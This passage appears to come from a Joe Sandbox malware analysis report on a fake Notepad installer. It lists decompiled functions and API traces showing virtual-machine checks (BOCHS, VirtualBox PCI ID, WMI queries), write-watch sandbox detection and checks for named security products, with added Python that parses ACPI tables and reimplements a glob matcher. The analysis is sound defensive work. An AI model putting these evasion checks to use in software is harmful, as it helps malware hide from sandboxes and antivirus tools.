                                      • String ID: BOCHS$BXPC$IPCA
                                      • API String ID: 1993750426-2341544300
                                      • Opcode ID: c043635897c7c42c75c8bf572af787cff6cc87ef1d823576dcb77a2d87424495
                                      • Instruction ID: a1b1ee883e99354cc8612b70e83c3bb2e0cff48973a6ca2f92c7b5abc9d8c177
                                      • Opcode Fuzzy Hash: c043635897c7c42c75c8bf572af787cff6cc87ef1d823576dcb77a2d87424495
                                      • Instruction Fuzzy Hash: 6B215731D42359BBEF2067969C45BFF7A7BDF05330F100469F901E1281DBB49E118AA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%
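The Similarity block above pairs malloc/memset with the strings BOCHS, BXPC and IPCA in the unmapped region at 0x006E0000. BOCHS and BXPC are what QEMU/Bochs firmware (SeaBIOS) writes into the OEM ID ("BOCHS ") and OEM Table ID ("BXPC" followed by the table signature) fields of its ACPI tables, which is why they appear in virtual-machine checks; on Windows those tables are read with GetSystemFirmwareTable using the 'ACPI' provider. The report only shows the strings, so reading them from ACPI headers is an assumption about the sample, and IPCA is left uninterpreted here. The following is an added example written for this page, not code from the sample or from Joe Sandbox: it parses an ACPI table header, verifies the checksum and flags the hypervisor OEM identifiers. The two tables it checks are constructed inline, not captured from a machine.

```python
# Added example (editor's code, not from the sample or the Joe Sandbox report).
# Parses an ACPI System Description Table header, verifies its checksum and
# flags OEM identifiers that QEMU/Bochs firmware writes into its tables:
# OEM ID "BOCHS " and OEM Table ID "BXPC" + table signature. That the sample
# obtains the strings from ACPI tables is an ASSUMPTION; the report only lists
# them. The tables below are constructed fixtures, not real firmware output.
import struct

# Signature, Length, Revision, Checksum, OEMID, OEMTableID, OEMRevision,
# CreatorID, CreatorRevision: the 36-byte header shared by every ACPI table.
ACPI_HEADER = struct.Struct("<4sIBB6s8sI4sI")
CHECKSUM_OFFSET = 9

HYPERVISOR_MARKERS = {
    b"BOCHS": "QEMU/Bochs (SeaBIOS) ACPI OEM ID",
    b"BXPC": "QEMU/Bochs ACPI OEM Table ID prefix",
}


def parse_acpi_header(table: bytes) -> dict:
    """Return the header fields; raises ValueError for a short or truncated table."""
    if len(table) < ACPI_HEADER.size:
        raise ValueError("table shorter than the 36-byte ACPI header")
    (sig, length, rev, chk, oem_id, oem_table_id,
     oem_rev, creator_id, creator_rev) = ACPI_HEADER.unpack_from(table)
    if length < ACPI_HEADER.size or length > len(table):
        raise ValueError(f"declared length {length} inconsistent with {len(table)} bytes")
    return {
        "signature": sig, "length": length, "revision": rev, "checksum": chk,
        "oem_id": oem_id, "oem_table_id": oem_table_id, "oem_revision": oem_rev,
        "creator_id": creator_id, "creator_revision": creator_rev,
    }


def acpi_checksum_ok(table: bytes) -> bool:
    """ACPI rule: all bytes over the declared length sum to 0 modulo 256."""
    length = parse_acpi_header(table)["length"]
    return sum(table[:length]) % 256 == 0


def hypervisor_markers(table: bytes) -> list:
    """Describe every OEM field whose value starts with a known hypervisor marker."""
    hdr = parse_acpi_header(table)
    hits = []
    for field in ("oem_id", "oem_table_id"):
        for marker, meaning in HYPERVISOR_MARKERS.items():
            if hdr[field].startswith(marker):
                value = hdr[field].strip().decode("ascii", "replace")
                hits.append(f"{field}={value!r}: {meaning}")
    return hits


def build_table(signature: bytes, oem_id: bytes, oem_table_id: bytes, body: bytes = b"") -> bytes:
    """Construct a table with a valid checksum (test fixture, not real firmware)."""
    length = ACPI_HEADER.size + len(body)
    header = ACPI_HEADER.pack(signature, length, 1, 0, oem_id.ljust(6),
                              oem_table_id.ljust(8), 1, b"EDIT", 1)
    raw = bytearray(header + body)
    raw[CHECKSUM_OFFSET] = (-sum(raw)) & 0xFF   # make the byte sum zero mod 256
    return bytes(raw)


# Constructed fixtures: a QEMU-style FACP and a made-up physical-vendor FACP.
QEMU_FACP = build_table(b"FACP", b"BOCHS ", b"BXPCFACP", b"\x00" * 8)
VENDOR_FACP = build_table(b"FACP", b"ACME  ", b"ACMEFACP", b"\x00" * 8)


def looks_like_vm(table: bytes) -> bool:
    """True when the table is well-formed and carries a hypervisor OEM marker."""
    return acpi_checksum_ok(table) and bool(hypervisor_markers(table))


if __name__ == "__main__":
    for name, table in (("qemu", QEMU_FACP), ("vendor", VENDOR_FACP)):
        print(name, looks_like_vm(table), hypervisor_markers(table))
```

The checksum check matters in both directions: a sandbox that patches OEM strings in place without fixing the checksum byte produces a table a careful sample can recognise as tampered, and an analyst comparing tables from a suspect guest can use the same check to confirm they are reading an intact table rather than a truncated dump.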

                                      C-Code - Quality: 100%
                                      			E00408690(signed int __eax, signed int __ecx, signed int __edx) {
                                      				signed int _t59;
                                      				signed int _t60;
                                      				signed int _t64;
                                      				signed int _t65;
                                      				signed int _t67;
                                      				signed int _t68;
                                      				signed int _t70;
                                      				void* _t72;
                                      				signed int _t74;
                                      				void* _t77;
                                      				signed int _t79;
                                      				signed int _t82;
                                      				signed int _t83;
                                      				signed int _t85;
                                      				signed int _t87;
                                      				signed int _t89;
                                      				signed int _t90;
                                      				signed int _t91;
                                      				signed int _t94;
                                      				signed int _t96;
                                      				signed int _t97;
                                      				signed int _t99;
                                      				signed int _t101;
                                      				signed int _t102;
                                      				signed int _t103;
                                      				signed int _t104;
                                      				signed int _t105;
                                      				signed int _t108;
                                      				signed int _t109;
                                      				signed int _t111;
                                      				signed int _t112;
                                      				signed int _t114;
                                      				signed int _t115;
                                      				signed int _t116;
                                      				signed int _t117;
                                      				signed int _t119;
                                      				signed int* _t120;
                                      
                                      				_t59 = __eax;
                                      				_t115 =  *((char*)(__eax));
                                      				_t120[7] = __edx;
                                      				_t120[0xa] = __ecx;
                                      				_t65 = _t115;
                                      				if(_t115 == 0x2d) {
                                      					L20:
                                      					_t82 =  *(_t59 + 1) & 0x000000ff;
                                      					_t89 = _t59 + 1;
                                      					if(_t115 == _t120[7]) {
                                      						_t67 = _t120[0xa] & 0x00000020;
                                      						while(1) {
                                      							_t60 = _t89 + 1;
                                      							if(_t82 == 0x5d) {
                                      								goto L25;
                                      							}
                                      							if(_t82 == 0x7f) {
                                      								L60:
                                      								_t82 =  *(_t89 + 1) & 0x000000ff;
                                      								if(_t67 != 0) {
                                      									_t89 = _t60;
                                      									continue;
                                      								} else {
                                      									_t104 = _t89 + 2;
                                      									_t89 = _t60;
                                      									_t60 = _t104;
                                      									goto L57;
                                      								}
                                      							} else {
                                      								L57:
                                      								while(_t82 != 0) {
                                      									_t82 =  *(_t89 + 1) & 0x000000ff;
                                      									_t89 = _t60;
                                      									_t60 = _t89 + 1;
                                      									if(_t82 != 0x5d) {
                                      										if(_t82 != 0x7f) {
                                      											continue;
                                      										} else {
                                      											goto L60;
                                      										}
                                      									}
                                      									goto L25;
                                      								}
                                      								goto L24;
                                      							}
                                      							goto L25;
                                      						}
                                      					} else {
                                      						_t115 = _t82;
                                      						goto L2;
                                      					}
                                      				} else {
                                      					_t89 = __eax;
                                      					if(_t115 == 0x5d) {
                                      						goto L20;
                                      					} else {
                                      						L2:
                                      						_t120[8] = _t120[0xa] & 0x00004000;
                                      						_t64 = _t115;
                                      						_t116 = _t89;
                                      						_t90 = _t65;
                                      						_t68 = _t64;
                                      						while(1) {
                                      							_t97 = _t116 + 1;
                                      							_t105 = _t68;
                                      							if(_t68 == 0x5d) {
                                      								break;
                                      							}
                                      							if(_t68 == 0x2d) {
                                      								_t68 =  *(_t116 + 1);
                                      								if(_t68 == 0x5d) {
                                      									_t116 = _t97;
                                      									_t90 = 0x2d;
                                      									goto L10;
                                      								} else {
                                      									_t111 = _t68;
                                      									if(_t111 == 0) {
                                      										break;
                                      									}
                                      									_t120[9] = _t116;
                                      									_t117 = _t90;
                                      									_t120[0xb] = _t116 + 2;
                                      									_t99 = _t111;
                                      									_t112 = _t120[8];
                                      									while(_t117 < _t99) {
                                      										if(_t112 != 0) {
                                      											_t77 = _t117 - _t120[7];
                                      											_t117 = _t117 + 1;
                                      											if(_t77 == 0) {
                                      												goto L32;
                                      											} else {
                                      												continue;
                                      											}
                                      										} else {
                                      											 *_t120 = _t117;
                                      											_t117 = _t117 + 1;
                                      											L0040A2C0();
                                      											_t79 = _t64;
                                      											_t64 = _t120[7];
                                      											 *_t120 = _t64;
                                      											L0040A2C0();
                                      											if(_t79 != _t64) {
                                      												continue;
                                      											} else {
                                      												L32:
                                      												_t103 = _t120[0xb];
                                      												_t96 =  *(_t120[9] + 2) & 0x000000ff;
                                      												_t87 = _t120[0xa] & 0x00000020;
                                      												while(1) {
                                      													_t31 = _t103 + 1; // 0x22
                                      													_t60 = _t31;
                                      													if(_t96 == 0x5d) {
                                      														goto L25;
                                      													}
                                      													if(_t96 == 0x7f) {
                                      														L38:
                                      														_t96 =  *(_t103 + 1) & 0x000000ff;
                                      														if(_t87 != 0) {
                                      															_t103 = _t60;
                                      															continue;
                                      														} else {
                                      															_t35 = _t103 + 2; // 0x24
                                      															_t103 = _t60;
                                      															_t60 = _t35;
                                      															goto L35;
                                      														}
                                      													} else {
                                      														L35:
                                      														while(_t96 != 0) {
                                      															_t96 =  *(_t103 + 1) & 0x000000ff;
                                      															_t103 = _t60;
                                      															_t33 = _t103 + 1; // 0x25
                                      															_t60 = _t33;
                                      															if(_t96 != 0x5d) {
                                      																if(_t96 != 0x7f) {
                                      																	continue;
                                      																} else {
                                      																	goto L38;
                                      																}
                                      															}
                                      															goto L25;
                                      														}
                                      														goto L24;
                                      													}
                                      													goto L25;
                                      												}
                                      											}
                                      										}
                                      										goto L25;
                                      									}
                                      									_t120[9] = _t120[0xb];
                                      									_t101 = _t99;
                                      									_t114 = _t117;
                                      									_t120[0xb] = _t120[9];
                                      									_t119 = _t120[8];
                                      									while(_t114 > _t101) {
                                      										if(_t119 != 0) {
                                      											_t72 = _t114 - _t120[7];
                                      											_t114 = _t114 - 1;
                                      											if(_t72 == 0) {
                                      												goto L45;
                                      											} else {
                                      												continue;
                                      											}
                                      										} else {
                                      											 *_t120 = _t114;
                                      											_t114 = _t114 - 1;
                                      											L0040A2C0();
                                      											_t74 = _t64;
                                      											_t64 = _t120[7];
                                      											 *_t120 = _t64;
                                      											L0040A2C0();
                                      											if(_t74 != _t64) {
                                      												continue;
                                      											} else {
                                      												L45:
                                      												_t102 = _t120[9];
                                      												_t94 =  *(_t120[0xb] + 2) & 0x000000ff;
                                      												_t85 = _t120[0xa] & 0x00000020;
                                      												while(1) {
                                      													_t47 = _t102 + 1; // 0x22
                                      													_t60 = _t47;
                                      													if(_t94 == 0x5d) {
                                      														goto L25;
                                      													}
                                      													if(_t94 == 0x7f) {
                                      														L51:
                                      														_t94 =  *(_t102 + 1) & 0x000000ff;
                                      														if(_t85 != 0) {
                                      															_t102 = _t60;
                                      															continue;
                                      														} else {
                                      															_t51 = _t102 + 2; // 0x24
                                      															_t102 = _t60;
                                      															_t60 = _t51;
                                      															goto L48;
                                      														}
                                      													} else {
                                      														L48:
                                      														while(_t94 != 0) {
                                      															_t94 =  *(_t102 + 1) & 0x000000ff;
                                      															_t102 = _t60;
                                      															_t49 = _t102 + 1; // 0x25
                                      															_t60 = _t49;
                                      															if(_t94 != 0x5d) {
                                      																if(_t94 != 0x7f) {
                                      																	continue;
                                      																} else {
                                      																	goto L51;
                                      																}
                                      															}
                                      															goto L25;
                                      														}
                                      														goto L24;
                                      													}
                                      													goto L25;
                                      												}
                                      											}
                                      										}
                                      										goto L25;
                                      									}
                                      									_t105 = _t101;
                                      									_t97 = _t120[9];
                                      									goto L7;
                                      								}
                                      							} else {
                                      								if(_t68 == 0) {
                                      									break;
                                      								}
                                      								L7:
                                      								if(_t105 == 0x2f || _t105 == 0x5c) {
                                      									break;
                                      								}
                                      								_t68 =  *_t97;
                                      								_t116 = _t97;
                                      								_t90 = _t105;
                                      								L10:
                                      								_t64 = _t120[8];
                                      								if(_t64 != 0) {
                                      									if(_t90 == _t120[7]) {
                                      										goto L12;
                                      									} else {
                                      										continue;
                                      									}
                                      								} else {
                                      									 *_t120 = _t90;
                                      									_t120[9] = _t90;
                                      									L0040A2C0();
                                      									_t109 = _t64;
                                      									_t64 = _t120[7];
                                      									 *_t120 = _t64;
                                      									L0040A2C0();
                                      									_t90 = _t120[9];
                                      									if(_t109 != _t64) {
                                      										continue;
                                      									} else {
                                      										L12:
                                      										_t83 = _t68;
                                      										_t91 = _t116;
                                      										_t70 = _t120[0xa] & 0x00000020;
                                      										while(1) {
                                      											_t60 = _t91 + 1;
                                      											if(_t83 == 0x5d) {
                                      												goto L25;
                                      											}
                                      											if(_t83 == 0x7f) {
                                      												L18:
                                      												_t83 =  *(_t91 + 1) & 0x000000ff;
                                      												if(_t70 != 0) {
                                      													_t91 = _t60;
                                      													continue;
                                      												} else {
                                      													_t108 = _t91 + 2;
                                      													_t91 = _t60;
                                      													_t60 = _t108;
                                      													goto L15;
                                      												}
                                      											} else {
                                      												L15:
                                      												while(_t83 != 0) {
                                      													_t83 =  *(_t91 + 1) & 0x000000ff;
                                      													_t91 = _t60;
                                      													_t60 = _t91 + 1;
                                      													if(_t83 != 0x5d) {
                                      														if(_t83 != 0x7f) {
                                      															continue;
                                      														} else {
                                      															goto L18;
                                      														}
                                      													}
                                      													goto L25;
                                      												}
                                      												goto L24;
                                      											}
                                      											goto L25;
                                      										}
                                      									}
                                      								}
                                      							}
                                      							goto L25;
                                      						}
                                      						L24:
                                      						return 0;
                                      					}
                                      				}
                                      				L25:
                                      				return _t60;
                                      			}
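The decompiled function E00408690 above, which the report reproduces without a name, has the shape of a bracket-expression matcher of the kind fnmatch() implementations call rangematch(): a ']' or '-' in first position is taken literally, 'x-y' ranges are walked one code point at a time in either direction, a '/' or '\' inside the class ends the match with "no match", and on success a pointer just past the closing ']' is returned (0 otherwise). The following is an added, readable Python equivalent written for this page to make that control flow legible; it is not the sample's code or the report's. The meanings attached to the 0x20 and 0x4000 flag bits, to the 0x7f byte (treated as an escape that is skipped when scanning for the closing ']') and to the paired calls to 0x0040A2C0 (treated as case folding) are inferred from the listing and are assumptions.

```python
# Added example (editor's code, not from the sample or the Joe Sandbox report).
# A readable bracket-expression matcher following the control flow of the
# decompiled E00408690 listing:
#   * a ']' or '-' in first position is a literal class member,
#   * 'x-y' is an inclusive range walked one code point at a time,
#   * a '/' or '\' inside the class ends the match with "no match",
#   * on success the position just past the closing ']' is returned.
# ASSUMPTIONS (inferred from the listing, not confirmed by the report): flag
# bit 0x4000 disables case folding, flag bit 0x20 disables escape handling,
# byte 0x7f is the escape byte, the helper at 0x0040A2C0 is a fold call.

ESCAPE = "\x7f"
NO_ESCAPE = 0x20
CASE_SENSITIVE = 0x4000


def _fold(c: str, flags: int) -> str:
    """Stand-in for the paired 0x0040A2C0 calls: identity when 0x4000 is set."""
    return c if flags & CASE_SENSITIVE else c.lower()


def _skip_to_close(pattern: str, i: int, flags: int):
    """Advance past the closing ']' (skipping escaped bytes); None if unterminated."""
    while i < len(pattern):
        c = pattern[i]
        if c == "]":
            return i + 1
        if c == ESCAPE and not flags & NO_ESCAPE:
            i += 1                            # escaped byte cannot close the class
        i += 1
    return None


def range_match(pattern: str, i: int, test: str, flags: int = 0):
    """pattern[i:] starts right after an opening '['. Return the index just past
    the matching ']' if `test` is in the class, else None (the listing returns 0)."""
    if i < len(pattern) and pattern[i] in "]-":
        if _fold(pattern[i], flags) == _fold(test, flags):
            return _skip_to_close(pattern, i + 1, flags)
        prev, i = pattern[i], i + 1           # literal first char becomes range lower bound
    else:
        prev = None
    while i < len(pattern):
        c = pattern[i]
        if c == "]":
            return None                       # class closed without a match
        if c == "-" and prev is not None:
            if i + 1 >= len(pattern):
                return None                   # pattern ends right after '-'
            hi = pattern[i + 1]
            if hi != "]":                     # '-' right before ']' is literal
                lo, up = sorted((prev, hi))   # listing walks up or down as needed
                for code in range(ord(lo), ord(up)):   # upper end compared below
                    if _fold(chr(code), flags) == _fold(test, flags):
                        return _skip_to_close(pattern, i + 2, flags)
                c, i = hi, i + 1              # continue with hi as the current char
        if c in "/\\":
            return None                       # path separator inside a class
        if _fold(c, flags) == _fold(test, flags):
            return _skip_to_close(pattern, i + 1, flags)
        prev, i = c, i + 1
    return None                               # unterminated class


if __name__ == "__main__":
    print(range_match("a-z]", 0, "m"))        # index past ']' on match
    print(range_match("a/b]", 0, "b"))        # None: separator ends the class
```

The return value mirrors the listing: a position just past the closing ']' on a match, and None (0 in the binary) when the class closes without a match, when a path separator appears inside it, or when the class is unterminated. A statically linked glob matcher is unremarkable on its own; in a stealer it is most often the file-pattern engine behind the wallet and credential searches the report flags, though the report does not show that call chain.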

[Address column for E00408690, flattened by extraction; the entries in this section run from 0x00408690 to 0x004089b0. The report pairs each address with one line of the C code above.]
                                      0x00408904
                                      0x00408908
                                      0x0040890a
                                      0x0040890a
                                      0x00408910
                                      0x00408919
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408919
                                      0x00000000
                                      0x00408910
                                      0x00000000
                                      0x004088fc
                                      0x00000000
                                      0x004088fa
                                      0x004088eb
                                      0x004088d6
                                      0x00000000
                                      0x004088b7
                                      0x004089a0
                                      0x004089a2
                                      0x00000000
                                      0x004089a2
                                      0x004086f1
                                      0x004086f3
                                      0x00000000
                                      0x00000000
                                      0x004086f9
                                      0x004086fc
                                      0x00000000
                                      0x00000000
                                      0x0040870b
                                      0x0040870e
                                      0x00408710
                                      0x00408712
                                      0x00408712
                                      0x00408718
                                      0x004086d8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040871a
                                      0x0040871a
                                      0x0040871d
                                      0x00408721
                                      0x00408726
                                      0x00408728
                                      0x0040872c
                                      0x0040872f
                                      0x00408734
                                      0x0040873c
                                      0x00000000
                                      0x0040873e
                                      0x0040873e
                                      0x0040873e
                                      0x00408744
                                      0x00408746
                                      0x00408749
                                      0x00408749
                                      0x0040874f
                                      0x00000000
                                      0x00000000
                                      0x00408754
                                      0x0040876d
                                      0x0040876d
                                      0x00408773
                                      0x00408998
                                      0x00000000
                                      0x00408779
                                      0x00408779
                                      0x0040877c
                                      0x0040877e
                                      0x00000000
                                      0x0040877e
                                      0x00408756
                                      0x00000000
                                      0x00408756
                                      0x0040875a
                                      0x0040875e
                                      0x00408760
                                      0x00408766
                                      0x0040876b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040876b
                                      0x00000000
                                      0x00408766
                                      0x00000000
                                      0x00408756
                                      0x00000000
                                      0x00408754
                                      0x00408749
                                      0x0040873c
                                      0x00408718
                                      0x00000000
                                      0x004086eb
                                      0x004087b8
                                      0x00000000
                                      0x004087b8
                                      0x004086b2
                                      0x004087c1
                                      0x004087c1

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: tolower
                                      • String ID: -$]
                                      • API String ID: 3025214199-736542798
                                      • Opcode ID: 50526ef0fa7fa220230c124b72132fb53abd79b36d4bfe43d8b5b27314f97089
                                      • Instruction ID: 0e16e2a22029aa4471a4307e3bb751e35b8c41450a7fa0057e64d5365dcf607c
                                      • Opcode Fuzzy Hash: 50526ef0fa7fa220230c124b72132fb53abd79b36d4bfe43d8b5b27314f97089
                                      • Instruction Fuzzy Hash: E081F8716087268BC3209E658680237F7D76B89300F59463FD8D8B7396DB3DED458B8A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: signal
                                      • String ID:
                                      • API String ID: 1946981877-0
                                      • Opcode ID: a6d89cd1dca3cd060e712da2f0e81d168bec7f68c2a16c06cb081c0e223766be
                                      • Instruction ID: 0244da68cefa54a946a1fdb71a4cdc3b43f1fbe4d34201c69b19d176bd4df485
                                      • Opcode Fuzzy Hash: a6d89cd1dca3cd060e712da2f0e81d168bec7f68c2a16c06cb081c0e223766be
                                      • Instruction Fuzzy Hash: 3031CF705042408AE710BB65854036B76D0AF46328F158B3FE1E9A67E5DB7E88C5971B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OpenProcessToken.ADVAPI32(?,00000008,?,?,?,00000000,?,?,006E4238,00000000), ref: 006E42D7
                                      • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,?,00000000,?,?,006E4238,00000000), ref: 006E42F2
                                      • GetLastError.KERNEL32(?,?,00000000,?,?,006E4238,00000000), ref: 006E42F8
                                      • malloc.MSVCRT ref: 006E4306
                                      • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?,?,00000000,?,?,006E4238,00000000), ref: 006E4320
                                      • GetSidSubAuthorityCount.ADVAPI32(00000000,?,00000000,?,?,006E4238,00000000), ref: 006E4328
                                      • GetSidSubAuthority.ADVAPI32(00000000,?,?,00000000,?,?,006E4238,00000000), ref: 006E4338
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E4341
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Token$AuthorityInformation$??3@CountErrorLastOpenProcessmalloc
                                      • String ID:
                                      • API String ID: 3908210838-0
                                      • Opcode ID: 620aec2656b9ae935a729f9f39fffb9d702ff1f8c142330c6656bf0da51c73d2
                                      • Instruction ID: 8a912f6d2cf7109b47d077a67bceab88343d8f4629f0f778e4e7536862eb4e2b
                                      • Opcode Fuzzy Hash: 620aec2656b9ae935a729f9f39fffb9d702ff1f8c142330c6656bf0da51c73d2
                                      • Instruction Fuzzy Hash: A6115E79501249BFEB015F62DC55DFA7F6EEF48794B100025FD00D6160DB329E41EE60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrcmpiW.KERNEL32(?,360SelfProtection), ref: 006EC8EB
                                      • lstrcmpiW.KERNEL32(?,BdDci), ref: 006EC8F7
                                      • lstrcmpiW.KERNEL32(?,rtp_process_monitor), ref: 006EC903
                                      • lstrcmpiW.KERNEL32(?,klkbdflt), ref: 006EC90F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcmpi
                                      • String ID: 360SelfProtection$BdDci$klkbdflt$rtp_process_monitor
                                      • API String ID: 1586166983-124983838
                                      • Opcode ID: c37ec6df34994478f209798cf6c1c01fc76b0ee9532dd30ee10e9bee43fdaa8d
                                      • Instruction ID: 6b88b7ec4f3ad1c24a8ce462295ec65f9cd1247e673573248ae92941369e4a7d
                                      • Opcode Fuzzy Hash: c37ec6df34994478f209798cf6c1c01fc76b0ee9532dd30ee10e9bee43fdaa8d
                                      • Instruction Fuzzy Hash: AAF0653274231EB6D700966A9C42DBA2BAF4E86FE47024026FE05F6192E661D90397B0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: calloc
                                      • String ID:
                                      • API String ID: 2635317215-3916222277
                                      • Opcode ID: dced49d9d8e3a5c8bea334ee0000a9fa209dacc67b99723163d93db5d258233c
                                      • Instruction ID: b0fabc89c6687b5b66766351c75e5e04b69d7b88fcf5b889cf2e489d489982cb
                                      • Opcode Fuzzy Hash: dced49d9d8e3a5c8bea334ee0000a9fa209dacc67b99723163d93db5d258233c
                                      • Instruction Fuzzy Hash: D6614BB59043168FC710DF18C48065ABBE1FF89314F09892DE989A7355E339E956CF82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00004000,00003000,00000004), ref: 006EA31A
                                      • VirtualAlloc.KERNEL32(00000000,01000000,00203000,00000040), ref: 006EA331
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA342
                                      • ResetWriteWatch.KERNEL32(00000000,01000000), ref: 006EA387
                                      • GetWriteWatch.KERNEL32(00000000,00000000,00001000,?,?,?), ref: 006EA3B1
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006EA3DC
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006EA3E2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Free$AllocWatchWrite$Reset
                                      • String ID:
                                      • API String ID: 3544933417-0
                                      • Opcode ID: 92906e4638f5111e12786b05f42839d045dedbb27dd7615661e341d52e746fd3
                                      • Instruction ID: 5257d3ce89104d9a7a56e89d99116bd2e9c35073006bb3bb32966834b8ab2a36
                                      • Opcode Fuzzy Hash: 92906e4638f5111e12786b05f42839d045dedbb27dd7615661e341d52e746fd3
                                      • Instruction Fuzzy Hash: 0731F570905389FFD7219FA98C88FAEBFAAEB05310F244569E551E72D0D6706E41CF20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • StrStrIW.SHLWAPI(?,PCI\VEN_80EE&DEV_CAFE), ref: 006EB7FC
                                      • VariantClear.OLEAUT32(00000008), ref: 006EB80D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: DeviceId$PCI\VEN_80EE&DEV_CAFE$ROOT\CIMV2$SELECT * FROM Win32_PnPEntity
                                      • API String ID: 261499160-736241479
                                      • Opcode ID: 4ed91df39edeca2c08dfb56d3f89eb047897585b672c6a441ca4113064fb1e75
                                      • Instruction ID: 02c01b0192d7907261f0f1b3b73baaeb9d64cf2643c95c3fbc5f4e73d51e8dcb
                                      • Opcode Fuzzy Hash: 4ed91df39edeca2c08dfb56d3f89eb047897585b672c6a441ca4113064fb1e75
